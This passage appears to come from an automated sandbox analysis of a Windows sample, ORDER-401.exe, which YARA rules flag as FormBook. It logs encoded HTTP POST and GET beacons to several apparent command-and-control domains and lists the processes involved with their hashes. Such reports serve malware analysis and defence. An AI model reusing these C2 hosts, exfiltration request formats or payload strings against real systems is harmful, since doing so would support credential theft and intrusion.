                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.8 | 49725 | 209.74.77.107 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:39:11.500159979 CET | 1862 | OUT | POST /a6qk/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.learnwithus.site/a6qk/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 58 47 30 2b 61 72 68 6c 57 7a 44 6a 50 42 33 2b 6f 38 65 76 56 59 56 59 72 31 6d 4f 41 42 71 65 4c 66 34 63 6f 64 2b 79 72 69 64 68 50 56 51 51 42 42 46 36 75 4f 49 4a 5a 30 5a 45 68 44 30 49 77 4d 4c 51 4d 4f 4e 56 7a 48 34 52 47 42 5a 30 7a 30 4c 7a 53 39 77 35 55 6f 2b 70 71 67 2f 43 57 70 6b 38 62 37 6e 63 76 64 55 6f 48 4e 61 43 4c 38 59 46 43 4a 59 33 47 34 73 50 41 43 5a 39 45 67 6e 54 78 31 52 54 67 4b 58 61 4c 32 37 6d 69 70 73 66 4a 4f 63 54 4f 44 6a 4e 52 4f 70 32 7a 55 6c 65 6a 57 50 77 4e 38 58 77 31 72 55 38 6d 4c 4f 53 72 77 6c 77 61 79 34 42 70 47 2b 2b 4b 45 6c 47 63 4e 54 37 72 32 59 58 59 4e 63 6f 4b 54 66 73 45 53 75 48 58 70 64 30 6d 50 45 4f 4f 64 69 2b 64 7a 6b 4a 6b 6c 54 73 66 4a 64 66 49 33 53 55 45 4b 32 73 45 37 72 71 4f 48 6b 45 6a 68 79 39 30 6c 35 54 32 2f 55 55 4d 68 36 47 54 35 55 53 65 31 51 4f 52 62 77 39 2f 4a 4f 46 35 32 36 39 62 4f 2b 62 7a 72 37 48 61 4f 65 44 44 78 56 56 6a 4b 69 6f 62 72 77 54 50 46 69 46 47 47 4c 41 65 6f 52 59 50 2b [TRUNCATED]
                                                                  Data Ascii: 84EhVDY=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 [TRUNCATED]
                                                                  Dec 12, 2024 21:39:12.784013033 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:12 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.8 | 49726 | 209.74.77.107 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:39:14.150553942 CET | 565 | OUT | GET /a6qk/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=aEceZcxMCBryYHP5wuuxALE/nyOJEnW8Dq1kpoaXpw1kPmwya2N1uoUJGmxyu00sisqpLeUFyGY8IB1P90PsS95xRIWFjwm0Cd59BaWixf9mBuP0aMIhNaQDKqAQJAIXVg== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.learnwithus.site
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Dec 12, 2024 21:39:15.387685061 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                  Date: Thu, 12 Dec 2024 20:39:15 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.8 | 49727 | 154.205.159.116 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 12, 2024 21:39:21.202306032 CET | 813 | OUT | POST /ao44/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Host: www.jijievo.site
                                                                  Origin: http://www.jijievo.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: max-age=0
                                                                  Referer: http://www.jijievo.site/ao44/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                  Data Raw: 38 34 45 68 56 44 59 3d 4e 2b 48 32 53 6b 71 44 31 6b 55 35 35 4f 4a 2b 36 75 68 56 57 48 2f 4c 78 2b 7a 33 4b 6a 37 4e 4a 43 53 4e 57 44 75 48 53 75 57 6f 31 43 63 39 44 32 75 35 52 64 35 6c 46 68 2f 6f 67 76 65 48 45 63 76 52 73 5a 45 75 59 73 36 42 79 4b 43 69 79 46 58 51 42 36 79 53 52 6e 54 78 69 75 54 53 46 2b 78 4d 4f 50 52 70 59 33 52 53 62 35 32 41 66 6c 63 30 4c 75 55 37 79 7a 31 31 6d 7a 64 39 76 4c 6d 34 79 51 65 53 41 76 43 46 35 72 73 35 42 79 59 46 70 4b 5a 6c 72 4f 37 47 4f 30 55 33 68 53 37 65 59 56 35 78 4a 68 4b 4d 36 6f 69 51 6a 4d 33 67 46 65 54 7a 59 44 2b 2f 72 45 2f 63 4d 4c 4c 4b 4f 36 6f 3d
Data Ascii: 84EhVDY=N+H2SkqD1kU55OJ+6uhVWH/Lx+z3Kj7NJCSNWDuHSuWo1Cc9D2u5Rd5lFh/ogveHEcvRsZEuYs6ByKCiyFXQB6ySRnTxiuTSF+xMOPRpY3RSb52Aflc0LuU7yz11mzd9vLm4yQeSAvCF5rs5ByYFpKZlrO7GO0U3hS7eYV5xJhKM6oiQjM3gFeTzYD+/rE/cMLLKO6o=
Dec 12, 2024 21:39:22.821970940 CET | 241 | IN | HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 Dec 2024 20:39:22 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 44
Connection: close
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
Data Ascii: KLIU(WHO-QHKM.g


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49728 | 154.205.159.116 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:23.862206936 CET | 833 | OUT | POST /ao44/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.jijievo.site
Origin: http://www.jijievo.site
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Referer: http://www.jijievo.site/ao44/
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 84EhVDY=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATcyo2gE9A3u5f95lKB/p//e6EcTjsY4uYsuByP+iy2/TAqz0eHTzmuTSF+xMOPEEY3ZSbIGANUc3COU47T11izd5vLmGyRCoAtqF5uQ5BjYEjKZZmu6CNxtysyb8S2MXVDW57eT65u/mGe7YYAWJuzi0Wob6Qt9ff9f97uIRxV2WI4csg0kD
Dec 12, 2024 21:39:25.493190050 CET | 241 | IN | HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 Dec 2024 20:39:25 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 44
Connection: close
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
Data Ascii: KLIU(WHO-QHKM.g


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49729 | 154.205.159.116 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:26.534866095 CET | 1850 | OUT | POST /ao44/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.jijievo.site
Origin: http://www.jijievo.site
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Referer: http://www.jijievo.site/ao44/
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 84EhVDY=N+H2SkqD1kU5r+Z+hN5VH3/M9ez3FD7RJCeNWBfATc6o2VY9CQ65c95lUR/S//edEYHnsY0QYuWBoqyi7n/TLqz0G3T2iuSSF+hIOPUEY3ZSbKOAaVc3EOU7yz1HmzccvLv9yRXXA9KF4Og5DRwEvKZhhu6kNxp5syHaS2JyVBG56a2isMruE82sXC+anUWwfrXQSfVfRqGR5/kp21LZRvUmgj8Jz0ikCtBNpEDKsvby8ZHvUkyn9Ynn8iTsCaaKDhpLbfKTfjemkBjvKeynjrZ4ha8Tkgqkhf6NjnsawbcwvcsQHw0Qj7+mqlm7Kf1Zv2WiFCJENp8EukDp3AaMAxlXMEG3e59inJ1JRWffa/nkRybyQW8RikF9M3MXmI3m+RiZVy7JqUVApG6GQPai5YK21giXp6x0R79j2vBd+w8YrNT+z0jAGrDmq0Ifad6E3qST4YCBWKk7i7YA8N85ld4UfNsaxTToXk7LHavOgOQeTKOammHxfmIorNA9ZSAaCP4fYcZbKmYIGAFvzXM8nr5HT6sEhSEeXlQC2uVepwgyS8/3Hs4K6BXCHjjEuDRpqw1OHsKk8RLax3T14WuO2vFVHF4b1NiDx6viZgN9pvBwwdNN9Wqmk9tqGKUI+1g2kuvII9rZ20FGZx+hPKeMSZjx4rm/I4P5VwGiuiaATL5w0FkLoHBTMbMr3HqVmTCO8xk2jbGinDZ8jh3eGHeRcK26Z8F8CPx+SgyyHMFFvlOE5rXUasD+yccGoDArTh7ybIBdbxwFZH6539umY+mokobik8S8w86JaYP/zO7nFbO63udF+c8KHwQLy7L6ezE7gDsGe+2lRYUhG5cVjB+CWOQnfx5DX+hxai7HRZq+iE28lQEluKZRnpGHaq0WvnB/j/NRAl9tGc35eQttyuj2ioRI48ZI58ZleAToHOMcNjQfX34VHCrQwZ7+YCy+EePnblD3LwVmNQa5c4InIGDtAjpwZ5rXno/3kXNCQ4NeANLg [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49730 | 154.205.159.116 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:29.202048063 CET | 561 | OUT | GET /ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.jijievo.site
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 12, 2024 21:39:30.889329910 CET | 197 | IN | HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 Dec 2024 20:39:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 24
Connection: close
Data Ascii: Unable to get connection


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49731 | 3.33.130.190 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:36.545583010 CET | 837 | OUT | POST /nqht/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.likesharecomment.net
Origin: http://www.likesharecomment.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Referer: http://www.likesharecomment.net/nqht/
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 84EhVDY=64TukoECUmIA/bRD4N/6Zb+B392+ALmxgXFGsw556vnHYvIo7rt4QSXdgQibPQEuNaRouV+6ljGTypYjLW2aGRQpgP7JRWxAsjkdzR/NhXvEeuzy2lpskPoxSFUEmMnj5US1CzVnli99jhL69l3Vkk/BxGEPOO8x9UUJxrc0wzrlw68mntSw2z+oA2ZLacVrBu6wNt4=
Dec 12, 2024 21:39:37.625699997 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49732 | 3.33.130.190 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:39.208513975 CET | 857 | OUT | POST /nqht/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.likesharecomment.net
Origin: http://www.likesharecomment.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Referer: http://www.likesharecomment.net/nqht/
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 84EhVDY=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cDHZLMo6qt4XSXd4giUCwExNaMXuQG6ljCTytIjLFeZHBQrov7HVWxAsjkdzQamhTDEe+jy2EpjsvoyRFUEiMn/5USDC2MMlg19jh766wbWuk/b/mEZDPVF3lMV/7Ux2wje8sNM9Pa21zWDA1x9frIDbNqAT6vhYala/AhFAbTsjKDCKt5t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49733 | 3.33.130.190 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:41.898597956 CET | 1874 | OUT | POST /nqht/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.likesharecomment.net
Origin: http://www.likesharecomment.net
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Referer: http://www.likesharecomment.net/nqht/
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 84EhVDY=64TukoECUmIA87hD0OH6Rb+ArN2+bbm1gXZGsxM+6cLHY4Uo7JV4WSXdmQjzCwFrNaVeuQaqlhqTzKgjaEeZMBQrkP7KRWxRsj0RzRqmhTDEe8ry/1pjqvoxSFUYmMnb5UL2C3c6mQV9iFX67CjWz0/dyGFaDPJa3khu/6Qb2wre+oQzvNKIkD6SG0pXbZ8JWsrveJPhO8gu0i9JDqS+1NLCHa4mn4QQNRz/gEeryx3p06Wi1L1GImo6mWsn8oNELhAJgfcOS1vLTtSPBWLFtLLwmRHO+v4biid8izfRUD/bOG+M9OdZfVqra2b6ybc09WbyiqXD+9snNXW2/VAmBtRwHn9ttllJfS88wwzNa0KXSg2921h2Nlj0rwNyZUSFwgxABUcxAVDjbmyfOf5g7/vAc5K+2jkkpCh1EZr8NrHJgMR9Dqy6ByqWI6FdDA6NrgZwIoS06NgrbLqs1GN0GZKs+tIszBnd49IfWloJcjxKRLnOm5h5fdrrUPJmE9gKSxVnbPuZRVpI2rtMYmCHZYAzLNGMduTjDX0CfmH1ujqoypgrcXRhy+P3+MPNLLO+cwTTOpZiABmMXl0/H3DeJrRxUzClhE3XGuiGRYMbf3V6N8wZaoB2g7Olgvl2QE5PRG0fHfn1zvlzF+E8yZThKvHlC18NLcVbQHHTf9NKs2iKrkA9P1wFfwalupSP19lHoJRqAWzGp8VTgJy9EtHYD1u8DoNXsukR2QC/Kjf691QyKNX+VJ6saa1kKw02KuQW/4SdueYR6AnmpJ1i3X0eQzEkiWPaASXePc2LSupThjcVEQYQ22S6SNVbVhJSWFHfSpIBFoPbdEcQeOofvgFwtVahaF8g5Yj6FQnSTYSYLHcKMsE+y1Ae9gPv4LNJxPK6PcMOmVGDngMxsTuhU3SOpRgBs4/znpUVrzAWJb5xLrEGJdE27DjJKBXf3a+zoIOStZJgcAH/nLsGpl5/5EUjYP/IKwNArWrc6lhczejKd/xM [TRUNCATED]
Dec 12, 2024 21:39:42.967243910 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49734 | 3.33.130.190 | 80 | 5240 | C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 21:39:44.560446978 CET | 569 | OUT | GET /nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Host: www.likesharecomment.net
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 12, 2024 21:39:45.713291883 CET | 397 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Thu, 12 Dec 2024 20:39:45 GMT
content-length: 276
connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU"}</script></head></html>



Target ID: 0
Start time: 15:36:44
Start date: 12/12/2024
Path: C:\Users\user\Desktop\ORDER-401.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ORDER-401.exe"
Imagebase: 0x8c0000
File size: 762'368 bytes
MD5 hash: 3DFA099EE923A3F449F97CA8F522F703
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 15:37:02
Start date: 12/12/2024
Path: C:\Users\user\Desktop\ORDER-401.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\ORDER-401.exe"
Imagebase: 0x9c0000
File size: 762'368 bytes
MD5 hash: 3DFA099EE923A3F449F97CA8F522F703
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 7
Start time: 15:37:47
Start date: 12/12/2024
Path: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exe"
Imagebase: 0xd60000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 8
Start time: 15:37:49
Start date: 12/12/2024
Path: C:\Windows\SysWOW64\tzutil.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\tzutil.exe"
Imagebase: 0xf0000
File size: 48'640 bytes
MD5 hash: 31DE852CCF7CED517CC79596C76126B4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
